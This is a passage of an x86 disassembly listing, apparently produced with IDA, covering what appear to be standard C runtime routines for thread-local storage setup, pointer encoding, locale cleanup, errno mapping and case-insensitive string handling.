cmp ebx, offset dword_423070
jz short loc_404DE9
push ebx
call sub_403603
pop ecx
loc_404DE9: ; CODE XREF: sub_404C69+177�j
call sub_4057D3
mov dword ptr [eax], 16h
jmp short loc_404DFA
; ---------------------------------------------------------------------------
loc_404DF6: ; CODE XREF: sub_404C69+30�j
and [ebp+var_20], 0
loc_404DFA: ; CODE XREF: sub_404C69+45�j
; sub_404C69+A1�j ...
mov eax, [ebp+var_20]
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_404C69
; =============== S U B R O U T I N E =======================================
sub_404E03 proc near ; CODE XREF: sub_40AB84+C�p
; sub_40ABE1+D�p ...
cmp ds:dword_434DD4, 0
jnz short loc_404E1E
push 0FFFFFFFDh
call sub_404C69
pop ecx
mov ds:dword_434DD4, 1
loc_404E1E: ; CODE XREF: sub_404E03+7�j
xor eax, eax
retn
sub_404E03 endp
; =============== S U B R O U T I N E =======================================
sub_404E21 proc near ; CODE XREF: sub_405073+31�p
; sub_4053B5+E8�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_404EA4
cmp eax, offset off_423F38
jz short loc_404EA4
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_404EA4
cmp [eax], ebp
jnz short loc_404EA4
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_404E6B
cmp [eax], ebp
jnz short loc_404E6B
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C704
pop ecx
pop ecx
loc_404E6B: ; CODE XREF: sub_404E21+31�j
; sub_404E21+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_404E8C
cmp [eax], ebp
jnz short loc_404E8C
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C6C4
pop ecx
pop ecx
loc_404E8C: ; CODE XREF: sub_404E21+52�j
; sub_404E21+56�j
push dword ptr [esi+0B0h]
call sub_403603
push dword ptr [esi+0BCh]
call sub_403603
pop ecx
pop ecx
loc_404EA4: ; CODE XREF: sub_404E21+12�j
; sub_404E21+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_404EF2
cmp [eax], ebp
jnz short loc_404EF2
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_403603
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_403603
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_403603
push dword ptr [esi+0C0h]
call sub_403603
add esp, 10h
loc_404EF2: ; CODE XREF: sub_404E21+8B�j
; sub_404E21+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_423E78
jz short loc_404F18
cmp [eax+0B4h], ebp
jnz short loc_404F18
push eax
call sub_40C534
push dword ptr [edi]
call sub_403603
pop ecx
pop ecx
loc_404F18: ; CODE XREF: sub_404E21+DE�j
; sub_404E21+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_404F1E: ; CODE XREF: sub_404E21+132�j
cmp dword ptr [edi-8], offset dword_423598
jz short loc_404F38
mov eax, [edi]
cmp eax, ebp
jz short loc_404F38
cmp [eax], ebp
jnz short loc_404F38
push eax
call sub_403603
pop ecx
loc_404F38: ; CODE XREF: sub_404E21+104�j
; sub_404E21+10A�j ...
cmp [edi-4], ebp
jz short loc_404F4F
mov eax, [edi+4]
cmp eax, ebp
jz short loc_404F4F
cmp [eax], ebp
jnz short loc_404F4F
push eax
call sub_403603
pop ecx
loc_404F4F: ; CODE XREF: sub_404E21+11A�j
; sub_404E21+121�j ...
add edi, 10h
dec ebx
jnz short loc_404F1E
push esi
call sub_403603
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404E21 endp
; =============== S U B R O U T I N E =======================================
sub_404F61 proc near ; CODE XREF: sub_405073+12�p
; sub_405266+93�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_41D1B8
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_404F7F
push eax
call edi
loc_404F7F: ; CODE XREF: sub_404F61+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_404F8C
push eax
call edi
loc_404F8C: ; CODE XREF: sub_404F61+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_404F99
push eax
call edi
loc_404F99: ; CODE XREF: sub_404F61+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_404FA6
push eax
call edi
loc_404FA6: ; CODE XREF: sub_404F61+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_404FAC: ; CODE XREF: sub_404F61+71�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_404FBE
mov eax, [ebx]
test eax, eax
jz short loc_404FBE
push eax
call edi
loc_404FBE: ; CODE XREF: sub_404F61+52�j
; sub_404F61+58�j
cmp dword ptr [ebx-4], 0
jz short loc_404FCE
mov eax, [ebx+4]
test eax, eax
jz short loc_404FCE
push eax
call edi
loc_404FCE: ; CODE XREF: sub_404F61+61�j
; sub_404F61+68�j
add ebx, 10h
dec ebp
jnz short loc_404FAC
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404F61 endp
; =============== S U B R O U T I N E =======================================
sub_404FE7 proc near ; CODE XREF: sub_405073+1D�p
; sub_4053B5+CC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40506F
push ebx
push ebp
push edi
mov edi, ds:dword_41D1BC
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_405009
push eax
call edi
loc_405009: ; CODE XREF: sub_404FE7+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_405016
push eax
call edi
loc_405016: ; CODE XREF: sub_404FE7+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_405023
push eax
call edi
loc_405023: ; CODE XREF: sub_404FE7+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_405030
push eax
call edi
loc_405030: ; CODE XREF: sub_404FE7+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_405036: ; CODE XREF: sub_404FE7+75�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_405048
mov eax, [ebx]
test eax, eax
jz short loc_405048
push eax
call edi
loc_405048: ; CODE XREF: sub_404FE7+56�j
; sub_404FE7+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_405058
mov eax, [ebx+4]
test eax, eax
jz short loc_405058
push eax
call edi
loc_405058: ; CODE XREF: sub_404FE7+65�j
; sub_404FE7+6C�j
add ebx, 10h
dec ebp
jnz short loc_405036
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop ebp
pop ebx
loc_40506F: ; CODE XREF: sub_404FE7+7�j
mov eax, esi
pop esi
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
sub_405073 proc near ; CODE XREF: sub_4050B1+54�p
test edi, edi
jz short loc_4050AE
test eax, eax
jz short loc_4050AE
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_4050AA
push edi
mov [eax], edi
call sub_404F61
test esi, esi
pop ecx
jz short loc_4050AA
push esi
call sub_404FE7
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4050AA
cmp esi, offset dword_4235A0
jz short loc_4050AA
push esi
call sub_404E21
pop ecx
loc_4050AA: ; CODE XREF: sub_405073+D�j
; sub_405073+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4050AE: ; CODE XREF: sub_405073+2�j
; sub_405073+6�j
xor eax, eax
retn
sub_405073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050B1 proc near ; CODE XREF: sub_40271F+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421470
call __SEH_prolog4
call sub_40539D
mov esi, eax
mov eax, ds:dword_423594
test [esi+70h], eax
jz short loc_4050F0
cmp dword ptr [esi+6Ch], 0
jz short loc_4050F0
call sub_40539D
mov esi, [eax+6Ch]
loc_4050DC: ; CODE XREF: sub_4050B1+68�j
test esi, esi
jnz short loc_4050E8
push 20h
call sub_40785D
pop ecx
loc_4050E8: ; CODE XREF: sub_4050B1+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4050F0: ; CODE XREF: sub_4050B1+1B�j
; sub_4050B1+21�j
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, ds:off_423678
call sub_405073
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40511B
jmp short loc_4050DC
sub_4050B1 endp
; =============== S U B R O U T I N E =======================================
sub_40511B proc near ; CODE XREF: sub_4050B1+63�p
; DATA XREF: J8@F_7_S:00421488�o
push 0Ch
call sub_40591F
pop ecx
mov esi, [ebp-1Ch]
retn
sub_40511B endp
; =============== S U B R O U T I N E =======================================
sub_405127 proc near ; CODE XREF: sub_402D09+81�p
; sub_402D09+96�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_40515B
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_40515B
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_40515B
mov eax, [eax+1F8h]
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515B: ; CODE XREF: sub_405127+11�j
; sub_405127+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_405184
push offset aEncodepointer ; "EncodePointer"
push eax
call ds:dword_41D0EC
loc_405176: ; CODE XREF: sub_405127+32�j
test eax, eax
jz short loc_405184
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_405184: ; CODE XREF: sub_405127+41�j
; sub_405127+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405127 endp
; =============== S U B R O U T I N E =======================================
sub_40518A proc near ; CODE XREF: sub_407B19+1�p
; sub_40B915+2F�p ...
push 0
call sub_405127
pop ecx
retn
sub_40518A endp
; =============== S U B R O U T I N E =======================================
sub_405193 proc near ; CODE XREF: sub_402D09+B�p
; sub_402D09+1C�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_4051C7
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_4051C7
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_4051C7
mov eax, [eax+1FCh]
jmp short loc_4051E2
; ---------------------------------------------------------------------------
loc_4051C7: ; CODE XREF: sub_405193+11�j
; sub_405193+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_4051F0
push offset aDecodepointer ; "DecodePointer"
push eax
call ds:dword_41D0EC
loc_4051E2: ; CODE XREF: sub_405193+32�j
test eax, eax
jz short loc_4051F0
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4051F0: ; CODE XREF: sub_405193+41�j
; sub_405193+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405193 endp
; =============== S U B R O U T I N E =======================================
sub_4051F6 proc near ; DATA XREF: sub_4054D6+8A�o
call ds:dword_41D180
retn 4
sub_4051F6 endp
; =============== S U B R O U T I N E =======================================
sub_4051FF proc near ; CODE XREF: sub_40531A+A�p
push ds:dword_42368C
call ds:dword_41D184
test eax, eax
jnz short locret_405228
push ds:dword_425E08
call sub_405193
pop ecx
push eax
push ds:dword_42368C
call ds:dword_41D17C
locret_405228: ; CODE XREF: sub_4051FF+E�j
retn
sub_4051FF endp
; =============== S U B R O U T I N E =======================================
sub_405229 proc near ; CODE XREF: sub_4054D6+12�p
; sub_4054D6:loc_405650�p
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_405249
push eax
push ds:dword_425E10
call sub_405193
pop ecx
call eax
or ds:dword_423688, 0FFFFFFFFh
loc_405249: ; CODE XREF: sub_405229+8�j
mov eax, ds:dword_42368C
cmp eax, 0FFFFFFFFh
jz short loc_405261
push eax
call ds:dword_41D178
or ds:dword_42368C, 0FFFFFFFFh
loc_405261: ; CODE XREF: sub_405229+28�j
jmp sub_4058CA
sub_405229 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405266 proc near ; CODE XREF: sub_40531A+59�p
; sub_4054D6+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_421490
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_423DC0
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_4052B8
push offset aEncodepointer ; "EncodePointer"
push eax
mov ebx, ds:dword_41D0EC
call ebx
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx
mov [esi+1FCh], eax
loc_4052B8: ; CODE XREF: sub_405266+2C�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_423070
mov [esi+68h], eax
push eax
call ds:dword_41D1B8
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_4052F6
mov eax, ds:off_423678
mov [esi+6Ch], eax
loc_4052F6: ; CODE XREF: sub_405266+86�j
push dword ptr [esi+6Ch]
call sub_404F61
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405311
call __SEH_epilog4
retn
sub_405266 endp
; =============== S U B R O U T I N E =======================================
sub_405311 proc near ; CODE XREF: sub_405266+A0�p
; DATA XREF: J8@F_7_S:004214A8�o
push 0Ch
call sub_40591F
pop ecx
retn
sub_405311 endp
; =============== S U B R O U T I N E =======================================
sub_40531A proc near ; CODE XREF: sub_40539D+1�p sub_4057D3�p ...
push esi
push edi
call ds:dword_41D0F0
mov edi, eax
call sub_4051FF
push ds:dword_423688
push ds:dword_42368C
call ds:dword_41D184
call eax
mov esi, eax
test esi, esi
jnz short loc_405391
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405391
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405388
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_405391
; ---------------------------------------------------------------------------
loc_405388: ; CODE XREF: sub_40531A+54�j
push esi
call sub_403603
pop ecx
xor esi, esi
loc_405391: ; CODE XREF: sub_40531A+27�j
; sub_40531A+3B�j ...
push edi
call ds:dword_41D174
pop edi
mov eax, esi
pop esi
retn
sub_40531A endp
; =============== S U B R O U T I N E =======================================
sub_40539D proc near ; CODE XREF: sub_40271F+F�p sub_403356�p ...
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_4053B1
push 10h
call sub_40785D
pop ecx
loc_4053B1: ; CODE XREF: sub_40539D+A�j
mov eax, esi
pop esi
retn
sub_40539D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B5 proc near ; DATA XREF: sub_4054D6+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_4214B0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4054B6
mov eax, [esi+24h]
test eax, eax
jz short loc_4053DA
push eax
call sub_403603
pop ecx
loc_4053DA: ; CODE XREF: sub_4053B5+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_4053E8
push eax
call sub_403603
pop ecx
loc_4053E8: ; CODE XREF: sub_4053B5+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_4053F6
push eax
call sub_403603
pop ecx
loc_4053F6: ; CODE XREF: sub_4053B5+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_405404
push eax
call sub_403603
pop ecx
loc_405404: ; CODE XREF: sub_4053B5+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_405412
push eax
call sub_403603
pop ecx
loc_405412: ; CODE XREF: sub_4053B5+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_405420
push eax
call sub_403603
pop ecx
loc_405420: ; CODE XREF: sub_4053B5+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_423DC0
jz short loc_405431
push eax
call sub_403603
pop ecx
loc_405431: ; CODE XREF: sub_4053B5+73�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_40545E
push edi
call ds:dword_41D1BC
test eax, eax
jnz short loc_40545E
cmp edi, offset dword_423070
jz short loc_40545E
push edi
call sub_403603
pop ecx
loc_40545E: ; CODE XREF: sub_4053B5+8D�j
; sub_4053B5+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054C1
push 0Ch
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_4054A3
push edi
call sub_404FE7
pop ecx
cmp edi, ds:off_423678
jz short loc_4054A3
cmp edi, offset dword_4235A0
jz short loc_4054A3
cmp dword ptr [edi], 0
jnz short loc_4054A3
push edi
call sub_404E21
pop ecx
loc_4054A3: ; CODE XREF: sub_4053B5+C9�j
; sub_4053B5+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054CD
push esi
call sub_403603
pop ecx
loc_4054B6: ; CODE XREF: sub_4053B5+11�j
call __SEH_epilog4
retn 4
sub_4053B5 endp
; =============== S U B R O U T I N E =======================================
sub_4054BE proc near ; DATA XREF: J8@F_7_S:004214C8�o
mov esi, [ebp+8]
sub_4054BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054C1 proc near ; CODE XREF: sub_4053B5+B0�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_4054C1 endp
; =============== S U B R O U T I N E =======================================
sub_4054CA proc near ; DATA XREF: J8@F_7_S:004214D4�o
mov esi, [ebp+8]
sub_4054CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054CD proc near ; CODE XREF: sub_4053B5+F5�p
push 0Ch
call sub_40591F
pop ecx
retn
sub_4054CD endp
; =============== S U B R O U T I N E =======================================
sub_4054D6 proc near ; CODE XREF: J8@F_7_S:loc_40401B�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov edi, eax
test edi, edi
jnz short loc_4054F1
call sub_405229
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4054F1: ; CODE XREF: sub_4054D6+10�j
push esi
mov esi, ds:dword_41D0EC
push offset dword_41D4D4
push edi
call esi
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov ds:dword_425E04, eax
call esi
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov ds:dword_425E08, eax
call esi
push offset aFlsfree ; "FlsFree"
push edi
mov ds:dword_425E0C, eax
call esi
cmp ds:dword_425E04, 0
mov esi, ds:dword_41D17C
mov ds:dword_425E10, eax
jz short loc_405551
cmp ds:dword_425E08, 0
jz short loc_405551
cmp ds:dword_425E0C, 0
jz short loc_405551
test eax, eax
jnz short loc_405575
loc_405551: ; CODE XREF: sub_4054D6+63�j
; sub_4054D6+6C�j ...
mov eax, ds:dword_41D184
mov ds:dword_425E08, eax
mov eax, ds:dword_41D178
mov ds:dword_425E04, offset sub_4051F6
mov ds:dword_425E0C, esi
mov ds:dword_425E10, eax
loc_405575: ; CODE XREF: sub_4054D6+79�j
call ds:dword_41D180
cmp eax, 0FFFFFFFFh
mov ds:dword_42368C, eax
jz loc_405655
push ds:dword_425E08
push eax
call esi
test eax, eax
jz loc_405655
call sub_407B19
push ds:dword_425E04
call sub_405127
push ds:dword_425E08
mov ds:dword_425E04, eax
call sub_405127
push ds:dword_425E0C
mov ds:dword_425E08, eax
call sub_405127
push ds:dword_425E10
mov ds:dword_425E0C, eax
call sub_405127
add esp, 10h
mov ds:dword_425E10, eax
call sub_405881
test eax, eax
jz short loc_405650
push offset sub_4053B5
push ds:dword_425E04
call sub_405193
pop ecx
call eax
cmp eax, 0FFFFFFFFh
mov ds:dword_423688, eax
jz short loc_405650
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405650
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405650
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_405657
; ---------------------------------------------------------------------------
loc_405650: ; CODE XREF: sub_4054D6+113�j
; sub_4054D6+130�j ...
call sub_405229
loc_405655: ; CODE XREF: sub_4054D6+AD�j
; sub_4054D6+BE�j
xor eax, eax
loc_405657: ; CODE XREF: sub_4054D6+178�j
pop esi
pop edi
retn
sub_4054D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40565A proc near ; CODE XREF: sub_4027D6+9B�p
; sub_4027D6+AD�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_4056CD
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_405699
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40CA44
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_4056A6
; ---------------------------------------------------------------------------
loc_405699: ; CODE XREF: sub_40565A+29�j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_4056A6: ; CODE XREF: sub_40565A+3D�j
test eax, eax
jz short loc_4056B9
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_405760
; ---------------------------------------------------------------------------
loc_4056B9: ; CODE XREF: sub_40565A+4E�j
; sub_40565A+EA�j
cmp [ebp+var_C], 0
jz short loc_4056C6
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4056C6: ; CODE XREF: sub_40565A+63�j
mov eax, ebx
jmp loc_40576D
; ---------------------------------------------------------------------------
loc_4056CD: ; CODE XREF: sub_40565A+1D�j
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_40570A
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40570A
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_40571F
; ---------------------------------------------------------------------------
loc_40570A: ; CODE XREF: sub_40565A+7D�j
; sub_40565A+9C�j
call sub_4057D3
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_40571F: ; CODE XREF: sub_40565A+AE�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40C2F9
add esp, 24h
test eax, eax
jz loc_4056B9
cmp eax, 1
jnz short loc_405755
movzx eax, [ebp+var_8]
jmp short loc_405760
; ---------------------------------------------------------------------------
loc_405755: ; CODE XREF: sub_40565A+F3�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_405760: ; CODE XREF: sub_40565A+5A�j
; sub_40565A+F9�j
cmp [ebp+var_C], 0
jz short loc_40576D
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40576D: ; CODE XREF: sub_40565A+6E�j
; sub_40565A+10A�j
pop esi
pop ebx
leave
retn
sub_40565A endp
; =============== S U B R O U T I N E =======================================
sub_405771 proc near ; CODE XREF: sub_4108BD+19�p
; sub_4108BD+36�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40578A
mov eax, [esp+arg_0]
lea ecx, [eax-41h]
cmp ecx, 19h
ja short locret_405797
add eax, 20h
retn
; ---------------------------------------------------------------------------
loc_40578A: ; CODE XREF: sub_405771+7�j
push 0
push [esp+4+arg_0]
call sub_40565A
pop ecx
pop ecx
locret_405797: ; CODE XREF: sub_405771+13�j
retn
sub_405771 endp
; =============== S U B R O U T I N E =======================================
sub_405798 proc near ; CODE XREF: sub_403603+80�p
; sub_4057F9+D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_40579E: ; CODE XREF: sub_405798+13�j
cmp eax, ds:dword_423690[ecx*8]
jz short loc_4057B9
inc ecx
cmp ecx, 2Dh
jl short loc_40579E
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_4057C1
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_405798+D�j
mov eax, ds:dword_423694[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_4057C1: ; CODE XREF: sub_405798+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405798 endp
; =============== S U B R O U T I N E =======================================
sub_4057D3 proc near ; CODE XREF: sub_4027D6+19�p
; sub_4027D6+4F�p ...
call sub_40531A
test eax, eax
jnz short loc_4057E2
mov eax, offset dword_4237F8
retn
; ---------------------------------------------------------------------------
loc_4057E2: ; CODE XREF: sub_4057D3+7�j
add eax, 8
retn
sub_4057D3 endp
; =============== S U B R O U T I N E =======================================
sub_4057E6 proc near ; CODE XREF: sub_4057F9+1�p
; sub_408AE1+14�p ...
call sub_40531A
test eax, eax
jnz short loc_4057F5
mov eax, offset dword_4237FC
retn
; ---------------------------------------------------------------------------
loc_4057F5: ; CODE XREF: sub_4057E6+7�j
add eax, 0Ch
retn
sub_4057E6 endp
; =============== S U B R O U T I N E =======================================
sub_4057F9 proc near ; CODE XREF: sub_408A4D+84�p
; sub_409DAD+3FB�p ...
arg_0 = dword ptr 4
push esi
call sub_4057E6
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_405798
pop ecx
mov esi, eax
call sub_4057D3
mov [eax], esi
pop esi
retn
sub_4057F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405820 proc near ; CODE XREF: sub_4028F9+9A�p
; sub_4029E9+42�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz short loc_40587A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40583C: ; CODE XREF: sub_405820+49�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40586B
or al, al
jz short loc_40586B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_405858
cmp ah, bl
ja short loc_405858
add ah, dh
loc_405858: ; CODE XREF: sub_405820+30�j
; sub_405820+34�j
cmp al, bh
jb short loc_405862
cmp al, bl
ja short loc_405862
add al, dh
loc_405862: ; CODE XREF: sub_405820+3A�j
; sub_405820+3E�j
cmp ah, al
jnz short loc_405871
sub ecx, 1
jnz short loc_40583C
loc_40586B: ; CODE XREF: sub_405820+22�j
; sub_405820+26�j
xor ecx, ecx
cmp ah, al
jz short loc_40587A
loc_405871: ; CODE XREF: sub_405820+44�j
mov ecx, 0FFFFFFFFh
jb short loc_40587A
neg ecx
loc_40587A: ; CODE XREF: sub_405820+B�j
; sub_405820+4F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_405820 endp
; =============== S U B R O U T I N E =======================================
sub_405881 proc near ; CODE XREF: sub_4054D6+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_425E18
loc_40588A: ; CODE XREF: sub_405881+35�j
cmp ds:dword_423804[esi*8], 1
jnz short loc_4058B2
lea eax, ds:423800h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_40CB14
test eax, eax
pop ecx
pop ecx
jz short loc_4058BE
loc_4058B2: ; CODE XREF: sub_405881+11�j
inc esi
cmp esi, 24h
jl short loc_40588A
xor eax, eax
inc eax
loc_4058BB: ; CODE XREF: sub_405881+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4058BE: ; CODE XREF: sub_405881+2F�j
and ds:dword_423800[esi*8], 0
xor eax, eax
